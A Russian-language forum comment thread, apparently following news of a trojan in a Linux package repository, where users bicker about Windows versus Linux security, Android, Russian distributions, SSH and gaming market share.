>Один вопрос. Да всё ты понял. Поведение Windows опередляется его разработчиками а не тобой. То что Винду ты лицензировал, а не купил - это прошлый век. Теперь уже Винда делает вид, что уважает твои настройки и групповые политики. А на самом деле ведёт себя по другому. На 2025 год юзая Windows OS ты фактически имеешь неуправляемую систему. >Какая взаимосвязь между трояном в репозитории (пусть и стороннем) для линукса и виндой? Так ты сам выдвинул ложное утверждение о том, что GNU/Linux небезопасен. Хотя, если конкретно рассматривать российские дистрибутивы, то они да - небозопасны. >Кстати, Android тоже вроде на лине построен (или уже нет и его упоминание невыгодно?) и тоже как винда устанавливает софт по одному нажатию, но "это другое", верно? Не увиливай. Мы же говорим про копилефтный GNU/Linux.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #188 Ответы: #193, #203, #215

193. Сообщение от Anonimm (?), 03-Авг-25, 11:24	+/–
> российские дистрибутивы Которые внезапно оказываются перелицованным дебианом с исчезновением упоминания прародителя. Всё как с современными Ладами и Москвичами > говорим про копилефтный GNU/Linux И при любом случае упоминаем винду как все в ней плохо, а если в лине нашли троян - сразу "это другое"..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #192

195. Сообщение от Anonimm (?), 03-Авг-25, 15:49	+/–
Объясни - какая взаимосвязь между трояном в xz и виндой? Это какой-то сюр! Зачем приплетать сюда другую систему? Давай напишем, что "в маке этот троян запустить не удастся" и будем всех пересаживать на мак? 4%-ное сообщество все не может избавиться от мифа (который само же и придумало), что якобы линукс безопасней всех. Но когда начинаешь им говорить, что опыт Android говорит об обратном, они начинают выдумывать, что" каждый вендор сам модифицирует ядро для определённого устройства" и то, что в своей основе все исходные функции работают как и задумано в Google, они упрямо игнорируют. Но зато когда надо превознести процент использования линукса, "вспоминают" об умных утюгах и фенах.. Двуличие и двойные стандарты - кредо 4%-ного сообщества, которое вопит, что винда плохая, но игры и софт, запускаемые ими под Wine - "это другое"..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #191

197. Сообщение от кантикариус (?), 03-Авг-25, 18:28	+/–
На Стиме недавно снова посчитали. Менее 3% у них получилось. Это вместе со Стимдекой! Причём, доля снижается. Видимо, лохи "Линукс для игр" под давлением реальности заканчиваются.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #180

198. Сообщение от Аноним (198), 03-Авг-25, 18:53	–1 +/–
Ждем, когда решат проверить crates.io.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #227

199. Сообщение от Аноним (199), 03-Авг-25, 19:08	+/–
бывает. иногда приходится понимать, что именно ты делаешь.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #49

200. Сообщение от dannyD (?), 03-Авг-25, 19:09	+/–
ну ты же называешь себя ЧЕЛОВЕКОМ!:DD Респект!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #150 Ответы: #209

201. Сообщение от Аноним (199), 03-Авг-25, 19:10	+/–
если "никто" не проверяет "ничего" как появился инфоповод к новости? а? ну нашли же, да? а раз нашли, то, видимо, проверяли? не? )
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10

202. Сообщение от dannyD (?), 03-Авг-25, 19:14	+/–
да я выяснил вопрос за 15 минут. но: 1. там есть аппимаг. 2. подобный софт ставится по принципу "работает не трогай", тут каконить дебиан-копролит лучшее будет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #170

203. Сообщение от Аноним (203), 03-Авг-25, 19:22	+1 +/–
Так и поведение копилефтного GNU/Linux опередляется его разработчиками а не тобой. Ты не то что патч к ядру не писал, ты исходники даже не читал. Они у тебя как годовой абонемент в спортзал: ни разу не воспользовался, но мысль о том что в любой момент можешь греет. И пользуешься ты не копилефтными свободами, а тем, что дядя майнтейнер дистрибутива собрал и в пакетик оформил. Так что не надо тут заливать про то, как ты системой управляешь. Всё твоё управление заканчивается на настройке гапсов в тайловом вм.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #192

204. Сообщение от Аноним (199), 03-Авг-25, 19:34	+/–
так-то обсуждается конкретный пакетный менеджер. которые разные в разных дистрибах. и при чём тут линь?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #182 Ответы: #207

206. Сообщение от Аноним (203), 03-Авг-25, 20:14	+/–
> А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет? Это ещё ладно, у меня на серверах в проде нет SSH. И ничего, небо на землю не падает.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #101 Ответы: #212

207. Сообщение от Anonimm (?), 03-Авг-25, 21:19	+/–
А винда тут с какой стороны?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #204

208. Сообщение от freeperson (?), 03-Авг-25, 22:31	+1 +/–
> Я выбирал между Слакой и Арчем. От Слаки отказался только из-за отсутствия > отслеживания зависимостей пакетов. Есть в Slackware отслеживание зависимостей - slpkg, например. А когда оно не нужно, можно просто юзать sbopkg.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #141

209. Сообщение от кантикариус (?), 04-Авг-25, 00:12	+/–
> ну ты же называешь себя ЧЕЛОВЕКОМ! Где и когда я так се6я называл? Пруфы будут? Но вот очередной владелец МАШИНЫ детектед.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #200 Ответы: #218

210. Сообщение от Аноним (210), 04-Авг-25, 10:52	+1 +/–
> подключился по RDP Ну конечно, передать команду из 15 байт это не нужно, а картинку надо надо... У вас виндовс головного мозга, юниксы в отличии от () никогда не отказывались от терминала, и он всегда оставался полноценным, и на десктопах и на одноплатниках, и на роутерах, которые одноплатники и есть, зачем городить огород, преобразования текста в изображение, а потом это транслировать в сеть, когда можно обойтись несколькими байтами.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #118

211. Сообщение от Аноним (210), 04-Авг-25, 10:57	+/–
> Не могу представить себе бухгалтера, который в минутку для отдыха от работы в 1С решил зайти по SSH на сервер Вас послушать, так надо капот на автомобили заварить автогеном, чтобы пользователь туда ни в коем случае не мог залезть. Ну может однажды так и будет, но после того как телефоны стали не разборными совсем - стало лучше? или просто добавилось геммороя по замене компонентов
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #116

212. Сообщение от Аноним (210), 04-Авг-25, 11:00	+1 +/–
В одном городе живет мальчик, у которого нет (подставить что угодно), и ничего, живет.. Доказательство того, что (что угодно) не нужно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #206

213. Сообщение от Аноним (210), 04-Авг-25, 11:07	+/–
Вот когда найдут уязвимость во всех линуксах, тогда и приходите, а то что одни открывают на своих роутерах бэкдоры для удобства, а другие не могут sudo написать без ошибок, какое это отношение имеет к ядру системы? или к компилятору (gcc) или к стандартной библиотеки (glibc) Вы обвиняете бетон в том, что из бетонной тюрьмы сбежал преступник, а охранники, и прочие меры пофиг, ну Л-логика
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #175 Ответы: #221

214. Сообщение от Аноним (210), 04-Авг-25, 11:11	+/–
>  Ты не поверишь, но большинство обычного софта на винду именно так и ставится. Лично тобою? ну, ок но вот мне кажется, что большенство софта залетают на компы через gpo, либо системы развертывания на заводе, там тоже качают по ссылкам с мейл-ру?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #184 Ответы: #222

215. Сообщение от L10N (ok), 04-Авг-25, 11:12	+1 +/–
>Хотя, если конкретно рассматривать российские дистрибутивы, то они да - небозопасны. Можете развить эту мысль? Чем они менее безопасны, чем не российские?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #192

216. Сообщение от Аноним (210), 04-Авг-25, 11:13	+/–
то есть ссылка на исходники на фдроиде ведущая на фдроид считается, а ведущая на гитхаб нет, а в чем разница то?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #177 Ответы: #223

217. Сообщение от Аноним (210), 04-Авг-25, 11:18	+/–
Мне вот интересно, а мезазойские амебы, если бы имели имели чуточку мозгов, тоже бы возмущались о том что не должны они отращивать ноги и бегать, ну типа просто лежать на камне и метаболизировать это же круто.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #178 Ответы: #224

218. Сообщение от dannyD (?), 04-Авг-25, 11:32	+/–
AI бот детектед.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #209

219. Сообщение от Котофалк (?), 04-Авг-25, 12:25	+/–
А давно на фенах и пылесосах AUR?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #180

220. Сообщение от Котофалк (?), 04-Авг-25, 12:36	+/–
> Это проблема куда шире чем кажется. Разработчик вылежат своё ПО только под Win и Mac, он не будит собирать под 100500 диструбтивов Linux на 4% рынка дисктопов! Проприетарный - не будет. Опенсорсному это и не надо, сборкой ПО под конкретный дистр занимаются мейнтейнеры оного дистра.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #86

221. Сообщение от Anonimm (?), 04-Авг-25, 12:49	+/–
А вот и ботинки новые завезли.. 😆
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #213

222. Сообщение от Anonimm (?), 04-Авг-25, 12:50	+/–
Игры тоже на заводе устанавливают?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #214 Ответы: #226

223. Сообщение от Anonimm (?), 04-Авг-25, 12:51	+/–
> сходи на f-droid почитай. Не надо менять обувь на ходу..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #216

224. Сообщение от Anonimm (?), 04-Авг-25, 12:51	+/–
Выходные удались, верно?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #217

226. Сообщение от нах. (?), 04-Авг-25, 16:19	+/–
Конечно! Он же на заводе по производству игорей заготовки пилит. Когда не устанавливает слесарям рач, конечно. (на том заводе у всех у кого не винда - рач, иначе б чего он какие-то gpo приплел)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #222

227. Сообщение от нах. (?), 04-Авг-25, 16:22	–1 +/–
А как ты там что-то проверишь, оно ж на хрусте. write-only да и то ИИ понаписал.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #198

230. Сообщение от Аноним (230), 06-Авг-25, 04:33	+/–
Я конечно на арче не сидел. Но по моему мнению очевидно что арч самый популярный дистрибутив, особенно после стим дека. По моему в будущем таких случаев будет много, ведь аудитория дистрибутива огромная
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #233

231. Сообщение от Аноним (231), 06-Авг-25, 20:18    Скрыто ботом-модератором	+/–
Смешно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1

232. Сообщение от Аноним (233), 12-Авг-25, 12:50	+/–
Идиотизм. Я уже давно запатчил ядро и сижу не парюсь с этими вирусами. Правда через AUR он поставился бы ((. Надо обдумать как это обойти инцидент. Хотя удалить хуук pacman и все. virusSTOP давно есть на гитхабе
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #234

233. Сообщение от Аноним (233), 12-Авг-25, 12:51	+/–
не "...после" , а всегда им был. самый свежий и легкий
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #230

234. Сообщение от Аноним (233), 12-Авг-25, 12:55	+/–
https://github.com/oditynet/virusSTOPyt Не благодарите ,любители по болтать нио чем, человека, который что-то делает
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #232

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема